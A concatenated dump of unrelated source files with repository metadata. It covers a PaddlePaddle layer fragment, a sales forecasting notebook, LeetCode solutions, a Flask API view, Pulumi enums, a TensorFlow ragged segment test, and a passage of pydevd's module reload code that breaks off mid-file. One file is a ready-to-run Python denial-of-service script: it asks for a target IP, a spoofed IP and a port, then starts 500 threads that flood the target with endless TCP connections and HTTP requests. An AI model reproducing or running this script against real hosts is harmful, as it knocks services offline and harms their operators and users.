# Tensor(shape=[2], dtype=float64, place=Place(gpu:0), stop_gradient=True,
# [4.99999860, 4.99999860])
"""
def __init__(self, p=2.0, epsilon=1e-6, keepdim=False, name=None):
super().__init__()
self.p = p
self.epsilon = epsilon
self.keepdim = keepdim
self.name = name
def forward(self, x, y):
return F.pairwise_distance(
x, y, self.p, self.epsilon, self.keepdim, self.name
)
def extra_repr(self):
main_str = 'p={p}'
if self.epsilon != 1e-6:
main_str += ', epsilon={epsilon}'
if self.keepdim is not False:
main_str += ', keepdim={keepdim}'
if self.name is not None:
main_str += ', name={name}'
return main_str.format(**self.__dict__)
| [
"[email protected]"
] | |
50ddef3e12604adbe00d3db3058a99758b1c10a0 | e02af62b3d0b8737a728b8169b91c37b7b99d0ab | /main.py | 43fc35413573f68d256ac16ab919537e9c42fe30 | [] | no_license | z9fr/DOS-Attack-Script | debaa6f7e7d04caaa658407d16208e4da2c32927 | 098920523bf5c152a86e1e32a8298f908f7f24fe | refs/heads/main | 2023-03-22T01:45:19.137301 | 2021-03-22T18:51:46 | 2021-03-22T18:51:46 | 313,788,301 | 11 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,604 | py | import socket
import threading
#target_ip = '195.20.52.179'
#fake_ip = '182.21.20.32'
#port = 80
print("\n\n")
print(" +-------------------------------------+")
print(" | nov, 18th, 2020 |")
print(" | This is a simple DOS attack script |")
print(" | Github: https://github.com/d4az |")
print(" | Author: Dasith Vidanage |")
print(" | Version: 0.1 |")
print(" +---------------------------d4az------+ ")
print("\n\n")
print("Enter ip Address of The Target ")
print("To Get the ip adress You can ping the domain in the terminal. eg #target = '120.00.00.000'")
target = input("\t == > ")
print("Enter The Fake Ip Address that you wants to spoof. eg: #fake_ip = '120.00.00.01' ")
fake_ip = input("\t\t ==> ")
print("Enter The Port Number You Want to Attack ? ")
port = input("\t\t ==> ")
port = int(port)
attack_num = 0
print("Sending Packets...")
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
global attack_num
attack_num += 1
packesnum =attack_num
packesnum= str(packesnum)
print("Packets Sending => "+packesnum)
print("Done")
s.close()
print("Packets Send Sucess!")
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()
| [
"[email protected]"
] | |
951368bbcf5ba887bbf79ec62af53c593f6f56e3 | 4ba1d93c5930afca3c5831504f02403999df1d9c | /Forecasting_cococola.py | 955a8bcb152f483b33b183188453502b9de1b00e | [] | no_license | Isiribn/Forecasting | 39273142f93cc657e1e77ac05180c55b4b1287db | ddb8065aa2a677e5ac42a7a7248ec953843341ba | refs/heads/main | 2023-04-01T05:57:44.900968 | 2021-04-09T11:28:58 | 2021-04-09T11:28:58 | 356,242,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,661 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
data=pd.read_excel('CocaCola_Sales_Rawdata.xlsx')
data.head()
# In[2]:
data.shape
# In[3]:
data.isnull().any()
# In[4]:
data.duplicated().any()
# In[5]:
data.info()
# In[6]:
data.describe()
# In[7]:
data.hist()
# In[10]:
import matplotlib.pyplot as plt
data.Sales.plot(label="org")
for i in range(2, 10, 2):
data["Sales"].rolling(i).mean().plot(label=str(i))
plt.legend(loc=3)
# In[11]:
data.plot(kind='kde')
# In[12]:
import statsmodels.api as sm
from statsmodels.tsa.seasonal import seasonal_decompose
from statsmodels.tsa.holtwinters import SimpleExpSmoothing # SES
from statsmodels.tsa.holtwinters import Holt # Holts Exponential Smoothing
from statsmodels.tsa.holtwinters import ExponentialSmoothing
import statsmodels.graphics.tsaplots as tsa_plots
import statsmodels.tsa.statespace as tm_models
#from datetime import datetime,time
# In[13]:
tsa_plots.plot_acf(data.Sales,lags=10)
tsa_plots.plot_pacf(data.Sales)
# In[14]:
train=data.head(48)
test=data.tail(12)
# In[15]:
import numpy as np
def MAPE(pred,org):
temp=np.abs((pred-org))*100/org
return np.mean(temp)
# In[16]:
#Simple Exponential Smoothing
ses_model=SimpleExpSmoothing(train["Sales"]).fit()
pred_ses=ses_model.predict(start=test.index[0],end=test.index[-1])
MAPE(pred_ses,test.Sales)
# In[17]:
#Holt Exponential smoothing
hw_model=Holt(train["Sales"]).fit()
pred_hw=hw_model.predict(start=test.index[0], end=test.index[-1])
MAPE(pred_hw,test.Sales)
# In[18]:
hwe_model_add_add = ExponentialSmoothing(train["Sales"],seasonal="add",trend="add",seasonal_periods=4,damped=True).fit()
pred_hwe_add_add = hwe_model_add_add.predict(start = test.index[0],end = test.index[-1])
MAPE(pred_hwe_add_add,test.Sales)
# In[19]:
hwe_model_mul_add = ExponentialSmoothing(train["Sales"],seasonal="mul",trend="add",seasonal_periods=4).fit()
pred_hwe_mul_add = hwe_model_mul_add.predict(start = test.index[0],end = test.index[-1])
MAPE(pred_hwe_mul_add,test.Sales)
# In[20]:
plt.plot(train.index, train["Sales"], label='Train',color="r")
# In[21]:
plt.plot(test.index, test["Sales"], label='Test',color="blue")
# In[22]:
plt.plot(pred_ses.index, pred_ses, label='SimpleExponential',color="green")
plt.plot(pred_hw.index, pred_hw, label='Holts_winter',color="red")
# In[23]:
plt.plot(pred_hwe_add_add.index,pred_hwe_add_add,label="HoltsWinterExponential_1",color="brown")
plt.plot(pred_hwe_mul_add.index,pred_hwe_mul_add,label="HoltsWinterExponential_2",color="yellow")
plt.legend(loc='best')
# In[ ]:
# In[ ]:
# In[ ]:
| [
"[email protected]"
] | |
563546f5b953d8a2b7b512856a99df5b88aef108 | bc23a3734e3ae3be64c6e5a1ae94204552d1a554 | /Arrays and Strings/06_findAinBOfString.py | 7556ff9313cf7b568601a6be3437ae664db28a80 | [] | no_license | mmrraju/Coding-interview-preparation | c3c2fc91c5ccbb383f4672af4ea77f169281529c | 738949fe7bc6e50d4bd55ac0b2b47c002ca0f464 | refs/heads/main | 2023-08-29T16:06:46.990849 | 2021-10-20T07:15:46 | 2021-10-20T07:15:46 | 408,050,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 852 | py | """ Given two stings ransomNote and magazine, return true if ransomNote can be constructed from magazine and false otherwise.
Each letter in magazine can only be used once in ransomNote """
magazine = input()
ransomNote = input()
def isMagazineInRansomNote(magazine, ransomNote):
d = {}
for ch in magazine:
if ch not in d:
d[ch] = 1
else:
d[ch] += 1
for ch in ransomNote:
if ch not in d:
return False
else: #if char present chech the count and reduce it
if d[ch] > 1:
d[ch] -= 1
else: # if char less then 1 and again appear delete it
del d[ch]
return True
print(isMagazineInRansomNote(magazine, ransomNote))
| [
"[email protected]"
] | |
97d31bc99318da98c36566bc2f7a502e1953d6d9 | 54e4c1a57765519c77d04fc02112c7f3bbacc595 | /prob_1317.py | 11e01b22fc965fafc4a81f4f1b4e4ef0ee88e358 | [] | no_license | Hrishikesh-3459/leetCode | 80a864228a8a2ae41ac2623f970a13f409234eed | 42def57b8f70d179ca688314ae43747fc1e410a0 | refs/heads/master | 2023-05-07T01:37:19.375229 | 2021-05-25T01:58:05 | 2021-05-25T01:58:05 | 254,803,743 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | class Solution:
def sortString(self, s: str) -> str:
x = list(s)
ans = []
ans_2 = []
fin = []
count = 0
while True:
for i in sorted(x):
if (i not in ans):
ans.append(i)
count +=1
x.pop(x.index(i))
for j in sorted(x)[::-1]:
if (j not in ans_2):
count +=1
ans_2.append(j)
x.pop(x.index(j))
fin += ans + ans_2
if (count == len(s)):
break
ans.clear()
ans_2.clear()
ans_str = ""
for j in fin:
ans_str += j
return ans_str
| [
"[email protected]"
] | |
b393f63f6ac9ee26aceb40dd7bb00e64e25785d3 | d806dd4a6791382813d2136283a602207fb4b43c | /sirius/blueprints/api/remote_service/tula/passive/childbirth/views.py | 1e86681447f1b9f6b1e9f4f7d3e504d827b7a501 | [] | no_license | MarsStirner/sirius | 5bbf2a03dafb7248db481e13aff63ff989fabbc2 | 8839460726cca080ca8549bacd3a498e519c8f96 | refs/heads/master | 2021-03-24T12:09:14.673193 | 2017-06-06T16:28:53 | 2017-06-06T16:28:53 | 96,042,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,382 | py | #! coding:utf-8
"""
@author: BARS Group
@date: 03.10.2016
"""
import sys
from flask import request
from sirius.blueprints.api.remote_service.tula.app import module
from sirius.blueprints.api.remote_service.tula.entities import TulaEntityCode
from sirius.blueprints.api.remote_service.tula.passive.childbirth.xform import \
ChildbirthTulaXForm
from sirius.blueprints.monitor.exception import remote_api_method
from sirius.blueprints.monitor.logformat import hook
parent_id_name = 'card_id'
@module.route('/api/integration/<int:api_version>/card/<' + parent_id_name + '>/childbirth/',
methods=['POST', 'PUT', 'DELETE'])
@remote_api_method(hook=hook)
def api_childbirth_change(api_version, **kwargs):
# main_id = kwargs.get(main_id_name)
parent_id = kwargs.get(parent_id_name)
stream_id = kwargs.get('stream_id')
data = None
delete = request.method == 'DELETE'
xform = ChildbirthTulaXForm(api_version, stream_id)
if not delete:
data = request.get_json()
xform.validate(data)
# main_id = data.get('main_id')
# xform.check_params(card_id, main_id, data)
service_name = sys._getframe().f_code.co_name
parents_params = {
parent_id_name: {'entity': TulaEntityCode.CARD, 'id': parent_id},
}
xform.send_messages(parent_id, parent_id_name, data, service_name, request.method, parents_params)
| [
"[email protected]"
] | |
c6569d076ffb391b828b0b0ad13e3266739a768b | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/attestation/v20210601preview/_enums.py | 647247b71cec4cfaee5ae075082eafac95c1b2cc | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 921 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'PrivateEndpointServiceConnectionStatus',
'PublicNetworkAccessType',
]
class PrivateEndpointServiceConnectionStatus(str, Enum):
"""
Indicates whether the connection has been Approved/Rejected/Removed by the owner of the service.
"""
PENDING = "Pending"
APPROVED = "Approved"
REJECTED = "Rejected"
class PublicNetworkAccessType(str, Enum):
"""
Controls whether traffic from the public network is allowed to access the Attestation Provider APIs.
"""
ENABLED = "Enabled"
"""Enables public network connectivity to the Attestation Provider REST APIs."""
DISABLED = "Disabled"
"""Disables public network connectivity to the Attestation Provider REST APIs."""
| [
"[email protected]"
] | |
0db5944ca26ded9a495afea5174be02aae5227b6 | 4671a70af604078c1c75ec11721620c091ee2873 | /bootcampBot_2.py | 7d12196e0688da826a29181db98821e546114d8f | [] | no_license | raheels88/DiscordPY_Bootcamp | a02b11a7755e2e3ebe402c86ba8071e77ec89f8a | 50bf5de85aa8c3180d49c4c7f35b87714ed3fe40 | refs/heads/main | 2023-07-15T17:22:42.551506 | 2021-08-18T18:29:21 | 2021-08-18T18:29:21 | 396,949,602 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,125 | py | import discord
import os
from yahoo_fin import stock_info as si #import yahoo_fin Python package - used to scrape stock price data from Yahoo Finance
client = discord.Client()
@client.event
async def on_ready():
print('Beep Boop Beep...{0.user}'.format(client) + ' is online')
#### MAKE YOUR BOT FETCH LIVE STOCK PRICES ###
@client.event
async def on_message(message):
msg = message.content
if message.author == client.user:
return
if msg.startswith('$hello'):
await message.channel.send('Hello!')
if msg.startswith('!price'): #if the message (sent by anyone but the bot) starts with '$price'...
ticker = msg[7:] #assign the variable 'ticker' to be the contents of the message from the 7th character onwards
price = round(si.get_live_price(ticker),2) #get_live_price is a method in the yahoo_fin package - this line gets the live price and rounds to 2 decimal places, and assigns the value to 'price'
await message.channel.send('Price of ' + ticker + ' is $' + str(price)) #Concatenate ticker and price variables with a + sign
client.run(os.getenv('TOKEN')) | [
"[email protected]"
] | |
0c0a1446e1f0184e7126eb177937b571e856de8d | 84a96dbd96e926ebb5c658e3cb897db276c32d6c | /tensorflow/python/ops/ragged/ragged_segment_op_test.py | d29708a5f5d98360502b4aef830d8d7c69c18c5c | [
"Apache-2.0"
] | permissive | MothCreations/gavlanWheels | bc9189092847369ad291d1c7d3f4144dd2239359 | 01d8a43b45a26afec27b971f686f79c108fe08f9 | refs/heads/master | 2022-12-06T09:27:49.458800 | 2020-10-13T21:56:40 | 2020-10-13T21:56:40 | 249,206,716 | 6 | 5 | Apache-2.0 | 2022-11-21T22:39:47 | 2020-03-22T14:57:45 | C++ | UTF-8 | Python | false | false | 9,618 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ragged_range op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl.testing import parameterized
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_math_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import googletest
def prod(values):
val = 1
for v in values:
val *= v
return val
# return reduce(lambda x, y: x * y, values, 1)
def mean(values):
return 1.0 * sum(values) / len(values)
def sqrt_n(values):
return 1.0 * sum(values) / math.sqrt(len(values))
@test_util.run_all_in_graph_and_eager_modes
class RaggedSegmentOpsTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
def expected_value(self, data, segment_ids, num_segments, combiner):
"""Find the expected value for a call to ragged_segment_<aggregate>.
Args:
data: The input RaggedTensor, expressed as a nested python list.
segment_ids: The segment ids, as a python list of ints.
num_segments: The number of segments, as a python int.
combiner: The Python function used to combine values.
Returns:
The expected value, as a nested Python list.
"""
self.assertLen(data, len(segment_ids))
# Build an empty (num_segments x ncols) "grouped" matrix
ncols = max(len(row) for row in data)
grouped = [[[] for _ in range(ncols)] for row in range(num_segments)]
# Append values from data[row] to grouped[segment_ids[row]]
for row in range(len(data)):
for col in range(len(data[row])):
grouped[segment_ids[row]][col].append(data[row][col])
# Combine the values.
return [[combiner(values)
for values in grouped_row
if values]
for grouped_row in grouped]
@parameterized.parameters(
(ragged_math_ops.segment_sum, sum, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_sum, sum, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_prod, prod, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_prod, prod, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_min, min, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_min, min, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_max, max, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_max, max, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_mean, mean, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_mean, mean, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 10, 10, 10]),
)
def testRaggedSegment_Int(self, segment_op, combiner, segment_ids):
rt_as_list = [[0, 1, 2, 3], [4], [], [5, 6], [7], [8, 9]]
rt = ragged_factory_ops.constant(rt_as_list)
num_segments = max(segment_ids) + 1
expected = self.expected_value(rt_as_list, segment_ids, num_segments,
combiner)
segmented = segment_op(rt, segment_ids, num_segments)
self.assertAllEqual(segmented, expected)
@parameterized.parameters(
(ragged_math_ops.segment_sum, sum, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_sum, sum, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_sum, sum, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_prod, prod, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_prod, prod, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_prod, prod, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_min, min, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_min, min, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_min, min, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_max, max, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_max, max, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_max, max, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_mean, mean, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_mean, mean, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_mean, mean, [0, 0, 0, 10, 10, 10]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 1, 1, 2, 2]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 0, 1, 1, 1]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [5, 4, 3, 2, 1, 0]),
(ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 0, 10, 10, 10]),
)
def testRaggedSegment_Float(self, segment_op, combiner, segment_ids):
rt_as_list = [[0., 1., 2., 3.], [4.], [], [5., 6.], [7.], [8., 9.]]
rt = ragged_factory_ops.constant(rt_as_list)
num_segments = max(segment_ids) + 1
expected = self.expected_value(rt_as_list, segment_ids, num_segments,
combiner)
segmented = segment_op(rt, segment_ids, num_segments)
self.assertAllClose(segmented, expected)
def testRaggedRankTwo(self):
rt = ragged_factory_ops.constant([
[[111, 112, 113, 114], [121],], # row 0
[], # row 1
[[], [321, 322], [331]], # row 2
[[411, 412]] # row 3
]) # pyformat: disable
segment_ids1 = [0, 2, 2, 2]
segmented1 = ragged_math_ops.segment_sum(rt, segment_ids1, 3)
expected1 = [[[111, 112, 113, 114], [121]], # row 0
[], # row 1
[[411, 412], [321, 322], [331]] # row 2
] # pyformat: disable
self.assertAllEqual(segmented1, expected1)
segment_ids2 = [1, 2, 1, 1]
segmented2 = ragged_math_ops.segment_sum(rt, segment_ids2, 3)
expected2 = [[],
[[111+411, 112+412, 113, 114], [121+321, 322], [331]],
[]] # pyformat: disable
self.assertAllEqual(segmented2, expected2)
def testRaggedSegmentIds(self):
rt = ragged_factory_ops.constant([
[[111, 112, 113, 114], [121],], # row 0
[], # row 1
[[], [321, 322], [331]], # row 2
[[411, 412]] # row 3
]) # pyformat: disable
segment_ids = ragged_factory_ops.constant([[1, 2], [], [1, 1, 2], [2]])
segmented = ragged_math_ops.segment_sum(rt, segment_ids, 3)
expected = [[],
[111+321, 112+322, 113, 114],
[121+331+411, 412]] # pyformat: disable
self.assertAllEqual(segmented, expected)
def testShapeMismatchError1(self):
dt = constant_op.constant([1, 2, 3, 4, 5, 6])
segment_ids = ragged_factory_ops.constant([[1, 2], []])
self.assertRaisesRegexp(
ValueError, 'segment_ids.shape must be a prefix of data.shape, '
'but segment_ids is ragged and data is not.',
ragged_math_ops.segment_sum, dt, segment_ids, 3)
def testShapeMismatchError2(self):
rt = ragged_factory_ops.constant([
[[111, 112, 113, 114], [121]], # row 0
[], # row 1
[[], [321, 322], [331]], # row 2
[[411, 412]] # row 3
]) # pyformat: disable
segment_ids = ragged_factory_ops.constant([[1, 2], [1], [1, 1, 2], [2]])
# Error is raised at graph-building time if we can detect it then.
self.assertRaisesRegexp(
errors.InvalidArgumentError,
'segment_ids.shape must be a prefix of data.shape.*',
ragged_math_ops.segment_sum, rt, segment_ids, 3)
# Otherwise, error is raised when we run the graph.
segment_ids2 = ragged_tensor.RaggedTensor.from_row_splits(
array_ops.placeholder_with_default(segment_ids.values, None),
array_ops.placeholder_with_default(segment_ids.row_splits, None))
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
'segment_ids.shape must be a prefix of data.shape.*'):
self.evaluate(ragged_math_ops.segment_sum(rt, segment_ids2, 3))
if __name__ == '__main__':
googletest.main()
| [
"[email protected]"
] | |
6ccc7f4bb583c7554918ac244ca1883a446d6583 | 8f2c55a2530c3e59dab5907c0044c618b88dd09b | /_pydevd_bundle/pydevd_reload.py | 507e73be2481c064a04777f28cadb48cc7177f70 | [
"Apache-2.0",
"EPL-1.0"
] | permissive | fabioz/PyDev.Debugger | 5a9c6d4c09be85a0e2d9fb93567fd65faf04c81d | 26864816cbfcf002a99913bcc31ebef48042a4ac | refs/heads/main | 2023-08-18T01:08:34.323363 | 2023-04-15T11:15:47 | 2023-04-15T11:15:47 | 21,870,144 | 363 | 126 | Apache-2.0 | 2023-07-30T23:03:31 | 2014-07-15T18:01:12 | Python | UTF-8 | Python | false | false | 15,773 | py | """
Based on the python xreload.
Changes
======================
1. we don't recreate the old namespace from new classes. Rather, we keep the existing namespace,
load a new version of it and update only some of the things we can inplace. That way, we don't break
things such as singletons or end up with a second representation of the same class in memory.
2. If we find it to be a __metaclass__, we try to update it as a regular class.
3. We don't remove old attributes (and leave them lying around even if they're no longer used).
4. Reload hooks were changed
These changes make it more stable, especially in the common case (where in a debug session only the
contents of a function are changed), besides providing flexibility for users that want to extend
on it.
Hooks
======================
Classes/modules can be specially crafted to work with the reload (so that it can, for instance,
update some constant which was changed).
1. To participate in the change of some attribute:
In a module:
__xreload_old_new__(namespace, name, old, new)
in a class:
@classmethod
__xreload_old_new__(cls, name, old, new)
A class or module may include a method called '__xreload_old_new__' which is called when we're
unable to reload a given attribute.
2. To do something after the whole reload is finished:
In a module:
__xreload_after_reload_update__(namespace):
In a class:
@classmethod
__xreload_after_reload_update__(cls):
A class or module may include a method called '__xreload_after_reload_update__' which is called
after the reload finishes.
Important: when providing a hook, always use the namespace or cls provided and not anything in the global
namespace, as the global namespace are only temporarily created during the reload and may not reflect the
actual application state (while the cls and namespace passed are).
Current limitations
======================
- Attributes/constants are added, but not changed (so singletons and the application state is not
broken -- use provided hooks to workaround it).
- Code using metaclasses may not always work.
- Functions and methods using decorators (other than classmethod and staticmethod) are not handled
correctly.
- Renamings are not handled correctly.
- Dependent modules are not reloaded.
- New __slots__ can't be added to existing classes.
Info
======================
Original: http://svn.python.org/projects/sandbox/trunk/xreload/xreload.py
Note: it seems https://github.com/plone/plone.reload/blob/master/plone/reload/xreload.py enhances it (to check later)
Interesting alternative: https://code.google.com/p/reimport/
Alternative to reload().
This works by executing the module in a scratch namespace, and then patching classes, methods and
functions in place. This avoids the need to patch instances. New objects are copied into the
target namespace.
"""
from _pydev_bundle.pydev_imports import execfile
from _pydevd_bundle import pydevd_dont_trace
import types
from _pydev_bundle import pydev_log
from _pydevd_bundle.pydevd_constants import get_global_debugger
NO_DEBUG = 0
LEVEL1 = 1
LEVEL2 = 2
DEBUG = NO_DEBUG
def write_err(*args):
py_db = get_global_debugger()
if py_db is not None:
new_lst = []
for a in args:
new_lst.append(str(a))
msg = ' '.join(new_lst)
s = 'code reload: %s\n' % (msg,)
cmd = py_db.cmd_factory.make_io_message(s, 2)
if py_db.writer is not None:
py_db.writer.add_command(cmd)
def notify_info0(*args):
write_err(*args)
def notify_info(*args):
if DEBUG >= LEVEL1:
write_err(*args)
def notify_info2(*args):
if DEBUG >= LEVEL2:
write_err(*args)
def notify_error(*args):
write_err(*args)
#=======================================================================================================================
# code_objects_equal
#=======================================================================================================================
def code_objects_equal(code0, code1):
for d in dir(code0):
if d.startswith('_') or 'line' in d or d in ('replace', 'co_positions', 'co_qualname'):
continue
if getattr(code0, d) != getattr(code1, d):
return False
return True
#=======================================================================================================================
# xreload
#=======================================================================================================================
def xreload(mod):
"""Reload a module in place, updating classes, methods and functions.
mod: a module object
Returns a boolean indicating whether a change was done.
"""
r = Reload(mod)
r.apply()
found_change = r.found_change
r = None
pydevd_dont_trace.clear_trace_filter_cache()
return found_change
# This isn't actually used... Initially I planned to reload variables which are immutable on the
# namespace, but this can destroy places where we're saving state, which may not be what we want,
# so, we're being conservative and giving the user hooks if he wants to do a reload.
#
# immutable_types = [int, str, float, tuple] #That should be common to all Python versions
#
# for name in 'long basestr unicode frozenset'.split():
# try:
# immutable_types.append(__builtins__[name])
# except:
# pass #Just ignore: not all python versions are created equal.
# immutable_types = tuple(immutable_types)
#=======================================================================================================================
# Reload
#=======================================================================================================================
class Reload:
def __init__(self, mod, mod_name=None, mod_filename=None):
self.mod = mod
if mod_name:
self.mod_name = mod_name
else:
self.mod_name = mod.__name__ if mod is not None else None
if mod_filename:
self.mod_filename = mod_filename
else:
self.mod_filename = mod.__file__ if mod is not None else None
self.found_change = False
def apply(self):
mod = self.mod
self._on_finish_callbacks = []
try:
# Get the module namespace (dict) early; this is part of the type check
modns = mod.__dict__
# Execute the code. We copy the module dict to a temporary; then
# clear the module dict; then execute the new code in the module
# dict; then swap things back and around. This trick (due to
# Glyph Lefkowitz) ensures that the (readonly) __globals__
# attribute of methods and functions is set to the correct dict
# object.
new_namespace = modns.copy()
new_namespace.clear()
if self.mod_filename:
new_namespace["__file__"] = self.mod_filename
try:
new_namespace["__builtins__"] = __builtins__
except NameError:
raise # Ok if not there.
if self.mod_name:
new_namespace["__name__"] = self.mod_name
if new_namespace["__name__"] == '__main__':
# We do this because usually the __main__ starts-up the program, guarded by
# the if __name__ == '__main__', but we don't want to start the program again
# on a reload.
new_namespace["__name__"] = '__main_reloaded__'
execfile(self.mod_filename, new_namespace, new_namespace)
# Now we get to the hard part
oldnames = set(modns)
newnames = set(new_namespace)
# Create new tokens (note: not deleting existing)
for name in newnames - oldnames:
notify_info0('Added:', name, 'to namespace')
self.found_change = True
modns[name] = new_namespace[name]
# Update in-place what we can
for name in oldnames & newnames:
self._update(modns, name, modns[name], new_namespace[name])
self._handle_namespace(modns)
for c in self._on_finish_callbacks:
c()
del self._on_finish_callbacks[:]
except:
pydev_log.exception()
def _handle_namespace(self, namespace, is_class_namespace=False):
on_finish = None
if is_class_namespace:
xreload_after_update = getattr(namespace, '__xreload_after_reload_update__', None)
if xreload_after_update is not None:
self.found_change = True
on_finish = lambda: xreload_after_update()
elif '__xreload_after_reload_update__' in namespace:
xreload_after_update = namespace['__xreload_after_reload_update__']
self.found_change = True
on_finish = lambda: xreload_after_update(namespace)
if on_finish is not None:
# If a client wants to know about it, give him a chance.
self._on_finish_callbacks.append(on_finish)
def _update(self, namespace, name, oldobj, newobj, is_class_namespace=False):
"""Update oldobj, if possible in place, with newobj.
If oldobj is immutable, this simply returns newobj.
Args:
oldobj: the object to be updated
newobj: the object used as the source for the update
"""
try:
notify_info2('Updating: ', oldobj)
if oldobj is newobj:
# Probably something imported
return
if type(oldobj) is not type(newobj):
# Cop-out: if the type changed, give up
if name not in ('__builtins__',):
notify_error('Type of: %s (old: %s != new: %s) changed... Skipping.' % (name, type(oldobj), type(newobj)))
return
if isinstance(newobj, types.FunctionType):
self._update_function(oldobj, newobj)
return
if isinstance(newobj, types.MethodType):
self._update_method(oldobj, newobj)
return
if isinstance(newobj, classmethod):
self._update_classmethod(oldobj, newobj)
return
if isinstance(newobj, staticmethod):
self._update_staticmethod(oldobj, newobj)
return
if hasattr(types, 'ClassType'):
classtype = (types.ClassType, type) # object is not instance of types.ClassType.
else:
classtype = type
if isinstance(newobj, classtype):
self._update_class(oldobj, newobj)
return
# New: dealing with metaclasses.
if hasattr(newobj, '__metaclass__') and hasattr(newobj, '__class__') and newobj.__metaclass__ == newobj.__class__:
self._update_class(oldobj, newobj)
return
if namespace is not None:
# Check for the `__xreload_old_new__` protocol (don't even compare things
# as even doing a comparison may break things -- see: https://github.com/microsoft/debugpy/issues/615).
xreload_old_new = None
if is_class_namespace:
xreload_old_new = getattr(namespace, '__xreload_old_new__', None)
if xreload_old_new is not None:
self.found_change = True
xreload_old_new(name, oldobj, newobj)
elif '__xreload_old_new__' in namespace:
xreload_old_new = namespace['__xreload_old_new__']
xreload_old_new(namespace, name, oldobj, newobj)
self.found_change = True
# Too much information to the user...
# else:
# notify_info0('%s NOT updated. Create __xreload_old_new__(name, old, new) for custom reload' % (name,))
except:
notify_error('Exception found when updating %s. Proceeding for other items.' % (name,))
pydev_log.exception()
# All of the following functions have the same signature as _update()
